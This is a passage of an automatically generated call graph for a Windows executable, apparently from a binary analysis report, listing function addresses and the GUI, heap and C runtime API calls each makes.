LoadIconA SendMessageA 13297->13301 13299->13296 13302 40d0ff 8 API calls 13300->13302 13304 40d0a3 GetDlgItem GetClientRect MoveWindow InvalidateRect 13300->13304 13301->13294 13303 40d243 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13302->13303 13306 40d309 17 API calls 13303->13306 13304->13302 13308 40d4d3 13306->13308 13309 40d4d9 CreateWindowExA 13306->13309 13310 40d507 9 API calls 13308->13310 13309->13310 13312 40d5f2 13310->13312 13311 40efae SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13311->13301 13312->13311 13313 40d6d9 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13312->13313 13315 40d688 GetDlgItem GetClientRect MoveWindow InvalidateRect 13312->13315 13316 40d7c9 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13313->13316 13317 40d7ac 13313->13317 13315->13313 13318 40d877 13316->13318 13319 40d87d CreateWindowExA 13316->13319 13317->13316 13320 40d8ab 9 API calls 13318->13320 13319->13320 13322 40d979 13320->13322 13321 40ef66 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13321->13311 13322->13321 13323 40da0b 9 API calls 13322->13323 13324 40d9ba GetDlgItem GetClientRect MoveWindow InvalidateRect 13322->13324 13326 40db73 CreateWindowExA 13323->13326 13327 40db6d 13323->13327 13324->13323 13328 40dba1 9 API calls 13326->13328 13327->13328 13329 40dc70 8 API calls 13328->13329 13331 40ef1e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13329->13331 13335 40dd6e 13329->13335 13331->13321 13332 40ddd8 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13333 40de87 13332->13333 13334 40de8d CreateWindowExA 13332->13334 13336 40debb 9 API calls 13333->13336 13334->13336 13335->13332 13338 40dd8d GetDlgItem GetClientRect MoveWindow InvalidateRect 13335->13338 13337 40df8a 13 API calls 13336->13337 13340 40e130 CreateWindowExA 13337->13340 13341 40e12a 13337->13341 13338->13332 13342 40e15e 9 API calls 13340->13342 13341->13342 13343 40e29d CreateFontIndirectA SelectObject SendMessageA SetTextColor 13342->13343 13347 40e303 13343->13347 13345 40eed6 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13345->13331 13346 40e3a6 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13350 40e49b 13346->13350 13347->13345 13347->13346 13348 40e34f GetDlgItem GetClientRect MoveWindow InvalidateRect 13347->13348 13348->13346 13351 40e4c8 13350->13351 13352 40ee8e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13350->13352 13353 40e54e CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13351->13353 13358 40e4ee GetDlgItem GetClientRect MoveWindow InvalidateRect 13351->13358 13352->13345 13355 40e620 CreateWindowExA 13353->13355 13356 40e61c 13353->13356 13357 40e64e 18 API calls 13355->13357 13356->13357 13359 40eb2b SendMessageA SetTimer TrackPopupMenuEx 13357->13359 13365 40e825 SHGetDesktopFolder 13357->13365 13358->13353 13361 40eb96 KillTimer 13359->13361 13362 40eb9f BeginPaint IsRectEmpty 13359->13362 13361->13362 13363 40ebf2 EndPaint GetClientRect 13362->13363 13364 40ebc6 GetSystemTime SetTimer 13362->13364 13366 40ec2e 13363->13366 13364->13363 13367 40e8de 13365->13367 13368 40ecf7 GetCursorInfo 13366->13368 13369 40ec38 SelectObject 13366->13369 13367->13359 13372 40ed4b GetCursorPos WindowFromPoint 13368->13372 13373 40ed2f 13368->13373 13370 40ecf0 DeleteDC 13369->13370 13371 40ec4b GetObjectA 13369->13371 13370->13368 13374 40ec65 GetClientRect StretchBlt 13371->13374 13375 40ece8 SelectObject 13371->13375 13376 40ed71 GetWindowThreadProcessId GetCurrentThreadId 13372->13376 13377 40edac GetCursor 13372->13377 13373->13372 13374->13375 13375->13370 13376->13377 13379 40ed88 AttachThreadInput 13376->13379 13378 40edb2 13377->13378 13380 40ee00 EnumFontFamiliesA GetActiveWindow 13378->13380 13383 40edda StrRetToStrA 13378->13383 13379->13377 13381 40ed96 GetCursor AttachThreadInput 13379->13381 13392 410c90 13380->13392 13381->13377 13381->13378 13383->13380 13385 40edef 13383->13385 13415 424ee2 13385->13415 13386 40ee4a 13432 411160 13386->13432 13391 40ee65 13393 410ca2 13392->13393 13394 410dc9 RaiseException 13392->13394 13393->13394 13395 410caa GetCurrentThreadId RtlEnterCriticalSection RtlLeaveCriticalSection 13393->13395 13394->13386 13451 423370 RtlEnterCriticalSection RegisterClipboardFormatA RegisterClipboardFormatA GetClassInfoExA 13395->13451 13397 410ce4 FindResourceA 13398 410d8f 13397->13398 13399 410cfc FindResourceA 13397->13399 13398->13386 13400 410d11 LoadResource LockResource 13399->13400 13401 410d24 13399->13401 13402 410d26 LoadResource 13400->13402 13401->13402 13403 410d36 LockResource 13402->13403 13404 410dba GetLastError 13402->13404 13406 410d43 13403->13406 13407 410dab GetLastError 13403->13407 13405 410d8b 13404->13405 13405->13398 13408 410da2 SetLastError 13405->13408 13466 410df0 13406->13466 13407->13405 13408->13398 13410 410d4a DialogBoxIndirectParamA 13411 410d71 GetLastError 13410->13411 13412 410d68 13410->13412 13413 410d6d 13411->13413 13412->13411 13412->13413 13413->13405 13414 410d7d GlobalHandle GlobalFree 13413->13414 13414->13405 13416 424eee ___lock_fhandle 13415->13416 13417 424f19 __flsbuf 13416->13417 13418 424efc 13416->13418 13803 4272b4 13417->13803 13419 427ffb __fclose_nolock 44 API calls 13418->13419 13420 424f01 13419->13420 13421 42515e __fclose_nolock 4 API calls 13420->13421 13424 424f11 ___lock_fhandle 13421->13424 13423 424f2b __flsbuf 13808 427351 13423->13808 13424->13380 13426 424f3d __flsbuf 13815 427421 13426->13815 13428 424f55 __flsbuf 13834 4273ed 13428->13834 14215 411180 13432->14215 13435 40ee5b 13437 411720 RtlEnterCriticalSection 13435->13437 13438 41177c RtlLeaveCriticalSection 13437->13438 13439 41173c 13437->13439 13440 411791 13438->13440 13447 4117b5 13438->13447 13439->13438 13442 411761 13439->13442 13444 42592a __fclose_nolock 44 API calls 13439->13444 13441 41179e 13440->13441 13443 42592a __fclose_nolock 44 API calls 13440->13443 13445 42592a __fclose_nolock 44 API calls 13441->13445 13441->13447 13442->13438 13443->13441 13444->13442 13445->13447 13446 411875 13446->13391 13447->13446 13448 411879 RaiseException 13447->13448 13450 411831 13447->13450 13448->13391 13449 411864 RtlDeleteCriticalSection 13449->13446 13450->13449 13452 4234b2 GetClassInfoExA 13451->13452 13453 4233cd LoadCursorA RegisterClassExA 13451->13453 13454 4235c4 RtlLeaveCriticalSection 13452->13454 13455 4234e9 LoadCursorA RegisterClassExA 13452->13455 13453->13454 13461 423438 13453->13461 13454->13397 13455->13454 13456 423550 13455->13456 13458 42358c 13456->13458 13459 4235e2 13456->13459 13463 42356c 13456->13463 13457 42347e 13457->13452 13458->13454 13460 4235fa 13459->13460 13486 41fe50 RaiseException 13459->13486 13460->13460 13461->13452 13461->13457 13461->13459 13475 4259b8 13461->13475 13463->13458 13465 4259b8 __recalloc 50 API calls 13463->13465 13465->13458 13468 410e07 13466->13468 13467 411120 13467->13410 13468->13467 13469 410f9d GlobalAlloc 13468->13469 13793 425302 13469->13793 13471 410fb4 13473 425302 _memcpy_s 44 API calls 13471->13473 13474 411112 13471->13474 13802 41fe50 RaiseException 13471->13802 13473->13471 13474->13410 13476 4259c7 13475->13476 13477 4259ef 13475->13477 13476->13477 13478 4259d3 13476->13478 13479 425a04 13477->13479 13493 42a9ca 13477->13493 13487 427ffb 13478->13487 13506 42a7af 13479->13506 13485 4259e8 _memset 13485->13457 13486->13459 13542 4282d1 GetLastError 13487->13542 13489 4259d8 13490 42515e 13489->13490 13491 4280fe __decode_pointer 4 API calls 13490->13491 13492 42516e __invoke_watson 13491->13492 13494 42a9d6 ___lock_fhandle 13493->13494 13495 42aa03 13494->13495 13496 42a9e6 13494->13496 13497 42aa44 RtlSizeHeap 13495->13497 13500 429cb8 __lock 44 API calls 13495->13500 13498 427ffb __fclose_nolock 44 API calls 13496->13498 13502 42a9fb ___lock_fhandle 13497->13502 13499 42a9eb 13498->13499 13501 42515e __fclose_nolock 4 API calls 13499->13501 13503 42aa13 ___sbh_find_block 13500->13503 13501->13502 13502->13479 13757 42aa64 13503->13757 13507 42a7bb ___lock_fhandle 13506->13507 13508 42a7c2 13507->13508 13509 42a7d0 13507->13509 13761 425aa0 13508->13761 13510 42a7e3 13509->13510 13511 42a7d7 13509->13511 13518 42a955 13510->13518 13534 42a7f0 ___sbh_resize_block ___sbh_find_block 13510->13534 13513 42592a __fclose_nolock 44 API calls 13511->13513 13532 42a7ca ___lock_fhandle __dosmaperr 13513->13532 13514 42a988 13516 428053 __calloc_impl 4 API calls 13514->13516 13515 42a95a RtlReAllocateHeap 13515->13518 13515->13532 13519 42a98e 13516->13519 13517 429cb8 __lock 44 API calls 13517->13534 13518->13514 13518->13515 13520 42a9ac 13518->13520 13522 428053 __calloc_impl 4 API calls 13518->13522 13524 42a9a2 13518->13524 13521 427ffb __fclose_nolock 44 API calls 13519->13521 13523 427ffb __fclose_nolock 44 API calls 13520->13523 13520->13532 13521->13532 13522->13518 13525 42a9b5 GetLastError 13523->13525 13527 427ffb __fclose_nolock 44 API calls 13524->13527 13525->13532 13540 42a923 13527->13540 13528 42a87b RtlAllocateHeap 13528->13534 13529 42a928 GetLastError 13529->13532 13530 42a8d0 RtlReAllocateHeap 13530->13534 13531 42a4ca ___sbh_alloc_block 5 API calls 13531->13534 13532->13485 13533 42a93b 13533->13532 13536 427ffb __fclose_nolock 44 API calls 13533->13536 13534->13514 13534->13517 13534->13528 13534->13530 13534->13531 13534->13532 13534->13533 13535 428053 __calloc_impl 4 API calls 13534->13535 13537 42a91e 13534->13537 13541 429d1b HeapFree ___sbh_free_block 13534->13541 13777 42a8f3 13534->13777 13535->13534 13538 42a948 13536->13538 13539 427ffb __fclose_nolock 44 API calls 13537->13539 13538->13525 13538->13532 13539->13540 13540->13529 13540->13532 13541->13534 13556 428179 TlsGetValue 13542->13556 13545 42833e SetLastError 13545->13489 13550 428335 13588 42592a 13550->13588 13551 42831d 13574 4281ea 13551->13574 13554 428325 GetCurrentThreadId 13554->13545 13555 42833b 13555->13545 13557 4281a9 13556->13557 13558 42818e 13556->13558 13557->13545 13561 42d60f 13557->13561 13559 4280fe __decode_pointer 4 API calls 13558->13559 13560 428199 TlsSetValue 13559->13560 13560->13557 13564 42d618 13561->13564 13563 4282fc 13563->13545 13566 4280fe 13563->13566 13564->13563 13565 42d636 Sleep 13564->13565 13601 42b241 13564->13601 13565->13564 13570 428112 13566->13570 13567 428137 GetModuleHandleW 13568 428152 GetProcAddress 13567->13568 13569 428147 13567->13569 13572 42812f 13568->13572 13736 42ad25 13569->13736 13570->13567 13570->13572 13572->13550 13572->13551 13740 426fac 13574->13740 13576 4281f6 GetModuleHandleW 13577 428206 13576->13577 13578 42820c 13576->13578 13579 42ad25 __crt_waiting_on_module_handle 2 API calls 13577->13579 13580 429cb8 __lock 42 API calls 13578->13580 13579->13578 13581 428267 InterlockedIncrement 13580->13581 13741 4282bf 13581->13741 13584 429cb8 __lock 42 API calls 13585 428288 ___addlocaleref 13584->13585 13744 4282c8 13585->13744 13587 4282b3 ___lock_fhandle 13587->13554 13589 425936 ___lock_fhandle 13588->13589 13590 425975 13589->13590 13591 4259af ___lock_fhandle __dosmaperr 13589->13591 13593 429cb8 __lock 42 API calls 13589->13593 13590->13591 13592 42598a HeapFree 13590->13592 13591->13555 13592->13591 13594 42599c 13592->13594 13597 42594d ___sbh_find_block 13593->13597 13595 427ffb __fclose_nolock 42 API calls 13594->13595 13596 4259a1 GetLastError 13595->13596 13596->13591 13598 425967 13597->13598 13749 429d1b 13597->13749 13753 425980 13598->13753 13602 42b24d ___lock_fhandle 13601->13602 13603 42b265 13602->13603 13613 42b284 _memset 13602->13613 13604 427ffb __fclose_nolock 43 API calls 13603->13604 13605 42b26a 13604->13605 13606 42515e __fclose_nolock 4 API calls 13605->13606 13608 42b27a ___lock_fhandle 13606->13608 13607 42b2f6 RtlAllocateHeap 13607->13613 13608->13564 13613->13607 13613->13608 13614 429cb8 13613->13614 13621 42a4ca 13613->13621 13627 42b33d 13613->13627 13630 428053 13613->13630 13615 429ce0 RtlEnterCriticalSection 13614->13615 13616 429ccd 13614->13616 13615->13613 13633 429bf5 13616->13633 13618 429cd3 13618->13615 13659 42ad55 13618->13659 13622 42a4f8 13621->13622 13623 42a591 13622->13623 13626 42a59a 13622->13626 13724 42a031 13622->13724 13623->13626 13731 42a0e1 13623->13731 13626->13613 13735 429bde RtlLeaveCriticalSection 13627->13735 13629 42b344 13629->13613 13631 4280fe __decode_pointer 4 API calls 13630->13631 13632 428063 13631->13632 13632->13613 13634 429c01 ___lock_fhandle 13633->13634 13635 429c27 13634->13635 13666 42b208 13634->13666 13643 429c37 ___lock_fhandle 13635->13643 13712 42d5ca 13635->13712 13641 429c58 13646 429cb8 __lock 44 API calls 13641->13646 13642 429c49 13645 427ffb __fclose_nolock 44 API calls 13642->13645 13643->13618 13645->13643 13648 429c5f 13646->13648 13649 429c93 13648->13649 13650 429c67 13648->13650 13651 42592a __fclose_nolock 44 API calls 13649->13651 13717 4303e6 13650->13717 13658 429c84 13651->13658 13653 429c72 13655 42592a __fclose_nolock 44 API calls 13653->13655 13653->13658 13656 429c7e 13655->13656 13657 427ffb __fclose_nolock 44 API calls 13656->13657 13657->13658 13721 429caf 13658->13721 13660 42b208 __FF_MSGBANNER 44 API calls 13659->13660 13661 42ad5f 13660->13661 13662 42b05d __NMSG_WRITE 44 API calls 13661->13662 13663 42ad67 13662->13663 13664 4280fe __decode_pointer 4 API calls 13663->13664 13665 429cdf 13664->13665 13665->13615 13667 42d57f __set_error_mode 44 API calls 13666->13667 13668 42b20f 13667->13668 13670 42d57f __set_error_mode 44 API calls 13668->13670 13673 42b21c 13668->13673 13669 42b05d __NMSG_WRITE 44 API calls 13671 42b234 13669->13671 13670->13673 13672 42b05d __NMSG_WRITE 44 API calls 13671->13672 13674 429c16 13672->13674 13673->13669 13673->13674 13675 42b05d 13674->13675 13676 42b071 13675->13676 13677 42d57f __set_error_mode 41 API calls 13676->13677 13708 429c1d 13676->13708 13678 42b093 13677->13678 13679 42b1d1 GetStdHandle 13678->13679 13681 42d57f __set_error_mode 41 API calls 13678->13681 13680 42b1df _strlen 13679->13680 13679->13708 13684 42b1f8 WriteFile 13680->13684 13680->13708 13682 42b0a4 13681->13682 13682->13679 13683 42b0b6 13682->13683 13685 428620 _strcpy_s 41 API calls 13683->13685 13683->13708 13684->13708 13686 42b0d8 13685->13686 13687 42b0ec GetModuleFileNameA 13686->13687 13688 425036 __invoke_watson 10 API calls 13686->13688 13689 42b10a 13687->13689 13694 42b12d _strlen 13687->13694 13690 42b0e9 13688->13690 13691 428620 _strcpy_s 41 API calls 13689->13691 13690->13687 13692 42b11a 13691->13692 13693 425036 __invoke_watson 10 API calls 13692->13693 13692->13694 13693->13694 13696 431037 __NMSG_WRITE 41 API calls 13694->13696 13705 42b170 13694->13705 13695 430fc3 _strcat_s 41 API calls 13697 42b183 13695->13697 13698 42b15d 13696->13698 13699 42b194 13697->13699 13701 425036 __invoke_watson 10 API calls 13697->13701 13703 425036 __invoke_watson 10 API calls 13698->13703 13698->13705 13700 430fc3 _strcat_s 41 API calls 13699->13700 13702 42b1a8 13700->13702 13701->13699 13704 42b1b9 13702->13704 13706 425036 __invoke_watson 10 API calls 13702->13706 13703->13705 13707 430e5a ___crtMessageBoxW 7 API calls 13704->13707 13705->13695 13706->13704 13707->13708 13709 42ada9 13708->13709 13710 42ad7e ___crtCorExitProcess GetModuleHandleW GetProcAddress 13709->13710 13711 42adb6 ExitProcess 13710->13711 13716 42d5d3 13712->13716 13713 425aa0 _malloc 43 API calls 13713->13716 13714 429c42 13714->13641 13714->13642 13715 42d5ea Sleep 13715->13716 13716->13713 13716->13714 13716->13715 13718 426fac ___lock_fhandle 13717->13718 13719 4303f2 InitializeCriticalSectionAndSpinCount 13718->13719 13720 430436 ___lock_fhandle 13719->13720 13720->13653 13722 429bde _doexit RtlLeaveCriticalSection 13721->13722 13723 429cb6 13722->13723 13723->13643 13725 42a044 RtlReAllocateHeap 13724->13725 13726 42a078 RtlAllocateHeap 13724->13726 13727 42a066 13725->13727 13729 42a062 13725->13729 13728 42a09b VirtualAlloc 13726->13728 13726->13729 13727->13726 13728->13729 13730 42a0b5 HeapFree 13728->13730 13729->13623 13730->13729 13732 42a0f8 VirtualAlloc 13731->13732 13734 42a13f 13732->13734 13734->13626 13735->13629 13737 42ad30 Sleep GetModuleHandleW 13736->13737 13738 42814d 13737->13738 13739 42ad4e 13737->13739 13738->13568 13738->13572 13739->13737 13739->13738 13740->13576 13747 429bde RtlLeaveCriticalSection 13741->13747 13743 428281 13743->13584 13748 429bde RtlLeaveCriticalSection 13744->13748 13746 4282cf 13746->13587 13747->13743 13748->13746 13750 429d5a 13749->13750 13752 429ffc 13749->13752 13751 429fc1 HeapFree 13750->13751 13750->13752 13751->13752 13752->13598 13756 429bde RtlLeaveCriticalSection 13753->13756 13755 425987 13755->13590 13756->13755 13760 429bde RtlLeaveCriticalSection 13757->13760 13759 42aa3f 13759->13497 13759->13502 13760->13759 13762 425ab2 13761->13762 13763 425b53 13761->13763 13767 42b208 __FF_MSGBANNER 44 API calls 13762->13767 13768 425b4b 13762->13768 13770 42b05d __NMSG_WRITE 44 API calls 13762->13770 13771 42ada9 _doexit 3 API calls 13762->13771 13772 425b3f 13762->13772 13773 428053 __calloc_impl 4 API calls 13762->13773 13775 425b44 13762->13775 13780 425a51 13762->13780 13764 428053 __calloc_impl 4 API calls 13763->13764 13765 425b59 13764->13765 13766 427ffb __fclose_nolock 44 API calls 13765->13766 13766->13768 13767->13762 13768->13532 13770->13762 13771->13762 13774 427ffb __fclose_nolock 44 API calls 13772->13774 13773->13762 13774->13775 13776 427ffb __fclose_nolock 44 API calls 13775->13776 13776->13768 13792 429bde RtlLeaveCriticalSection 13777->13792 13779 42a8fa 13779->13534 13781 425a5d ___lock_fhandle 13780->13781 13782 429cb8 __lock 44 API calls 13781->13782 13783 425a8e ___lock_fhandle 13781->13783 13784 425a73 13782->13784 13783->13762 13785 42a4ca ___sbh_alloc_block 5 API calls 13784->13785 13786 425a7e 13785->13786 13788 425a97 13786->13788 13791 429bde RtlLeaveCriticalSection 13788->13791 13790 425a9e 13790->13783 13791->13790 13792->13779 13796 425316 _memset 13793->13796 13797 425312 13793->13797 13794 42531b 13795 427ffb __fclose_nolock 44 API calls 13794->13795 13801 425320 13795->13801 13796->13794 13796->13797 13798 425365 13796->13798 13797->13471 13798->13797 13800 427ffb __fclose_nolock 44 API calls 13798->13800 13799 42515e __fclose_nolock 4 API calls 13799->13797 13800->13801 13801->13799 13802->13471 13804 4272c1 13803->13804 13805 4272d7 RtlEnterCriticalSection 13803->13805 13806 429cb8 __lock 44 API calls 13804->13806 13805->13423 13807 4272ca 13806->13807 13807->13423 13842 42f340 13808->13842 13812 4273b3 13812->13426 13813 427366 __flsbuf 13813->13812 13814 42d5ca __malloc_crt 44 API calls 13813->13814 13814->13812 13857 425dd8 13815->13857 13818 42748c 13819 427ffb __fclose_nolock 44 API calls 13818->13819 13821 427491 13819->13821 13820 42f340 __fileno 44 API calls 13831 4274cd __aulldvrm _strlen 13820->13831 13822 42515e __fclose_nolock 4 API calls 13821->13822 13823 4274a3 13822->13823 13868 426e9b 13823->13868 13825 427f96 13825->13428 13827 42f5e5 70 API calls __output_l 13827->13831 13828 42592a __fclose_nolock 44 API calls 13828->13831 13829 42f4de 48 API calls __cftof 13829->13831 13830 42f63e 70 API calls _write_string 13830->13831 13831->13818 13831->13823 13831->13827 13831->13828 13831->13829 13831->13830 13832 4280fe GetModuleHandleW GetProcAddress Sleep GetModuleHandleW __decode_pointer 13831->13832 13833 42f618 70 API calls _write_multi_char 13831->13833 13865 42f4fb 13831->13865 13832->13831 13833->13831 13835 4273f8 13834->13835 13836 424f66 13834->13836 13835->13836 14067 42c98c 13835->14067 13838 424f7e 13836->13838 13839 424f83 __flsbuf 13838->13839 14209 427322 13839->14209 13841 424f8e 13841->13424 13843 42f34f 13842->13843 13844 427360 13842->13844 13845 427ffb __fclose_nolock 44 API calls 13843->13845 13848 42f2dc 13844->13848 13846 42f354 13845->13846 13847 42515e __fclose_nolock 4 API calls 13846->13847 13847->13844 13849 42f2f8 13848->13849 13850 42f2e9 13848->13850 13853 427ffb __fclose_nolock 44 API calls 13849->13853 13855 42f31c 13849->13855 13851 427ffb __fclose_nolock 44 API calls 13850->13851 13852 42f2ee 13851->13852 13852->13813 13854 42f30c 13853->13854 13856 42515e __fclose_nolock 4 API calls 13854->13856 13855->13813 13856->13855 13858 425deb 13857->13858 13864 425e38 13857->13864 13876 42834a 13858->13876 13861 425e18 13861->13864 13896 42bbde 13861->13896 13864->13818 13864->13820 13864->13831 13866 425dd8 _LocaleUpdate::_LocaleUpdate 46 API calls 13865->13866 13867 42f50e 13866->13867 13867->13831 13869 426ea3 13868->13869 13870 426ea5 IsDebuggerPresent 13868->13870 13869->13825 14066 42807b 13870->14066 13873 42edb3 SetUnhandledExceptionFilter UnhandledExceptionFilter 13874 42edd0 __invoke_watson 13873->13874 13875 42edd8 GetCurrentProcess TerminateProcess 13873->13875 13874->13875 13875->13825 13877 4282d1 __getptd_noexit 44 API calls 13876->13877 13878 428352 13877->13878 13879 425df0 13878->13879 13880 42ad55 __amsg_exit 44 API calls 13878->13880 13879->13861 13881 42c34a 13879->13881 13880->13879 13882 42c356 ___lock_fhandle 13881->13882 13883 42834a __getptd 44 API calls 13882->13883 13884 42c35b 13883->13884 13885 42c389 13884->13885 13886 42c36d 13884->13886 13887 429cb8 __lock 44 API calls 13885->13887 13888 42834a __getptd 44 API calls 13886->13888 13889 42c390 13887->13889 13890 42c372 13888->13890 13912 42c30c 13889->13912 13894 42ad55 __amsg_exit 44 API calls 13890->13894 13895 42c380 ___lock_fhandle 13890->13895 13894->13895 13895->13861 13897 42bbea ___lock_fhandle 13896->13897 13898 42834a __getptd 44 API calls 13897->13898 13899 42bbef 13898->13899 13900 429cb8 __lock 44 API calls 13899->13900 13901 42bc01 13899->13901 13902 42bc1f 13900->13902 13904 42bc0f ___lock_fhandle 13901->13904 13908 42ad55 __amsg_exit 44 API calls 13901->13908 13903 42bc68 13902->13903 13905 42bc50 InterlockedIncrement 13902->13905 13906 42bc36 InterlockedDecrement 13902->13906 14062 42bc79 13903->14062 13904->13864 13905->13903 13906->13905 13909 42bc41 13906->13909 13908->13904 13909->13905 13910 42592a __fclose_nolock 44 API calls 13909->13910 13911 42bc4f 13910->13911 13911->13905 13913 42c310 ___addlocaleref ___removelocaleref 13912->13913 13915 42c342 13912->13915 13913->13915 13919 42c09b 13913->13919 13916 42c3b4 13915->13916 14061 429bde RtlLeaveCriticalSection 13916->14061 13918 42c3bb 13918->13890 13920 42c11f 13919->13920 13921 42c0b2 13919->13921 13922 42c16c 13920->13922 13923 42592a __fclose_nolock 44 API calls 13920->13923 13921->13920 13930 42c0e6 13921->13930 13933 42592a __fclose_nolock 44 API calls 13921->13933 13928 42c193 13922->13928 13973 43155a 13922->13973 13924 42c140 13923->13924 13926 42592a __fclose_nolock 44 API calls 13924->13926 13929 42c153 13926->13929 13932 42c1d8 13928->13932 13935 42592a 44 API calls __fclose_nolock 13928->13935 13936 42592a __fclose_nolock 44 API calls 13929->13936 13937 42592a __fclose_nolock 44 API calls 13930->13937 13948 42c107 13930->13948 13931 42592a __fclose_nolock 44 API calls 13938 42c114 13931->13938 13939 42592a __fclose_nolock 44 API calls 13932->13939 13940 42c0db 13933->13940 13934 42592a __fclose_nolock 44 API calls 13934->13928 13935->13928 13941 42c161 13936->13941 13942 42c0fc 13937->13942 13943 42592a __fclose_nolock 44 API calls 13938->13943 13944 42c1de 13939->13944 13949 431734 13940->13949 13946 42592a __fclose_nolock 44 API calls 13941->13946 13965 4316ef 13942->13965 13943->13920 13944->13915 13946->13922 13948->13931 13950 431741 13949->13950 13964 4317be 13949->13964 13951 431752 13950->13951 13953 42592a __fclose_nolock 44 API calls 13950->13953 13952 431764 13951->13952 13954 42592a __fclose_nolock 44 API calls 13951->13954 13955 431776 13952->13955 13956 42592a __fclose_nolock 44 API calls 13952->13956 13953->13951 13954->13952 13957 42592a __fclose_nolock 44 API calls 13955->13957 13959 431788 13955->13959 13956->13955 13957->13959 13958 4317ac 13963 42592a __fclose_nolock 44 API calls 13958->13963 13958->13964 13960 42592a __fclose_nolock 44 API calls 13959->13960 13962 43179a 13959->13962 13960->13962 13961 42592a __fclose_nolock 44 API calls 13961->13958 13962->13958 13962->13961 13963->13964 13964->13930 13966 4316fc 13965->13966 13972 431730 13965->13972 13967 43170c 13966->13967 13968 42592a __fclose_nolock 44 API calls 13966->13968 13969 42592a __fclose_nolock 44 API calls 13967->13969 13970 43171e 13967->13970 13968->13967 13969->13970 13971 42592a __fclose_nolock 44 API calls 13970->13971 13970->13972 13971->13972 13972->13948 13974 43156b 13973->13974 14060 42c18c 13973->14060 13975 42592a __fclose_nolock 44 API calls 13974->13975 13976 431573 13975->13976 13977 42592a __fclose_nolock 44 API calls 13976->13977 13978 43157b 13977->13978 13979 42592a __fclose_nolock 44 API calls 13978->13979 13980 431583 13979->13980 13981 42592a __fclose_nolock 44 API calls 13980->13981 13982 43158b 13981->13982 13983 42592a __fclose_nolock 44 API calls 13982->13983 13984 431593 13983->13984 13985 42592a __fclose_nolock 44 API calls 13984->13985 13986 43159b 13985->13986 13987 42592a __fclose_nolock 44 API calls 13986->13987 13988 4315a2 13987->13988 13989 42592a __fclose_nolock 44 API calls 13988->13989 13990 4315aa 13989->13990 13991 42592a __fclose_nolock 44 API calls 13990->13991 13992 4315b2 13991->13992 13993 42592a __fclose_nolock 44 API calls 13992->13993 13994 4315ba 13993->13994 13995 42592a __fclose_nolock 44 API calls 13994->13995 13996 4315c2 13995->13996 13997 42592a __fclose_nolock 44 API calls 13996->13997 13998 4315ca 13997->13998 13999 42592a __fclose_nolock 44 API calls 13998->13999 14000 4315d2 13999->14000 14001 42592a __fclose_nolock 44 API calls 14000->14001 14002 4315da 14001->14002 14003 42592a __fclose_nolock 44 API calls 14002->14003 14004 4315e2 14003->14004 14005 42592a __fclose_nolock 44 API calls 14004->14005 14006 4315ea 14005->14006 14007 42592a __fclose_nolock 44 API calls 14006->14007 14008 4315f5 14007->14008 14009 42592a __fclose_nolock 44 API calls 14008->14009 14010 4315fd 14009->14010 14011 42592a __fclose_nolock 44 API calls 14010->14011 14012 431605 14011->14012 14013 42592a __fclose_nolock 44 API calls 14012->14013 14014 43160d 14013->14014 14015 42592a __fclose_nolock 44 API calls 14014->14015 14016 431615 14015->14016 14017 42592a __fclose_nolock 44 API calls 14016->14017 14018 43161d 14017->14018 14019 42592a __fclose_nolock 44 API calls 14018->14019 14020 431625 14019->14020 14021 42592a __fclose_nolock 44 API calls 14020->14021 14022 43162d 14021->14022 14023 42592a __fclose_nolock 44 API calls 14022->14023 14024 431635 14023->14024 14025 42592a __fclose_nolock 44 API calls 14024->14025 14026 43163d 14025->14026 14027 42592a __fclose_nolock 44 API calls 14026->14027 14028 431645 14027->14028 14029 42592a __fclose_nolock 44 API calls 14028->14029 14030 43164d 14029->14030 14031 42592a __fclose_nolock 44 API calls 14030->14031 14032 431655 14031->14032 14033 42592a __fclose_nolock 44 API calls 14032->14033 14034 43165d 14033->14034 14035 42592a __fclose_nolock 44 API calls 14034->14035 14036 431665 14035->14036 14037 42592a __fclose_nolock 44 API calls 14036->14037 14038 43166d 14037->14038 14039 42592a __fclose_nolock 44 API calls 14038->14039 14040 43167b 14039->14040 14041 42592a __fclose_nolock 44 API calls 14040->14041 14042 431686 14041->14042 14043 42592a __fclose_nolock 44 API calls 14042->14043 14044 431691 14043->14044 14045 42592a __fclose_nolock 44 API calls 14044->14045 14046 43169c 14045->14046 14047 42592a __fclose_nolock 44 API calls 14046->14047 14048 4316a7 14047->14048 14049 42592a __fclose_nolock 44 API calls 14048->14049 14050 4316b2 14049->14050 14051 42592a __fclose_nolock 44 API calls 14050->14051 14052 4316bd 14051->14052 14053 42592a __fclose_nolock 44 API calls 14052->14053 14054 4316c8 14053->14054 14055 42592a __fclose_nolock 44 API calls 14054->14055 14056 4316d3 14055->14056 14057 42592a __fclose_nolock 44 API calls 14056->14057 14058 4316de 14057->14058 14059 42592a __fclose_nolock 44 API calls 14058->14059 14059->14060 14060->13934 14061->13918 14065 429bde RtlLeaveCriticalSection 14062->14065 14064 42bc80 14064->13901 14065->14064 14066->13873 14068 42c9c7 14067->14068 14069 42c9a5 14067->14069 14068->13836 14069->14068 14070 42f340 __fileno 44 API calls 14069->14070 14071 42c9c0 14070->14071 14073 430d17 14071->14073 14074 430d23 ___lock_fhandle 14073->14074 14075 430d46 14074->14075 14076 430d2b 14074->14076 14078 430d54 14075->14078 14081 430d95 14075->14081 14098 42800e 14076->14098 14080 42800e __write_nolock 44 API calls 14078->14080 14083 430d59 14080->14083 14101 43341e 14081->14101 14082 427ffb __fclose_nolock 44 API calls 14093 430d38 ___lock_fhandle 14082->14093 14085 427ffb __fclose_nolock 44 API calls 14083->14085 14087 430d60 14085->14087 14086 430d9b 14088 430da8 14086->14088 14089 430dbe 14086->14089 14090 42515e __fclose_nolock 4 API calls 14087->14090 14111 4305e4 14088->14111 14092 427ffb __fclose_nolock 44 API calls 14089->14092 14090->14093 14095 430dc3 14092->14095 14093->14068 14094 430db6 14170 430de9 14094->14170 14096 42800e __write_nolock 44 API calls 14095->14096 14096->14094 14099 4282d1 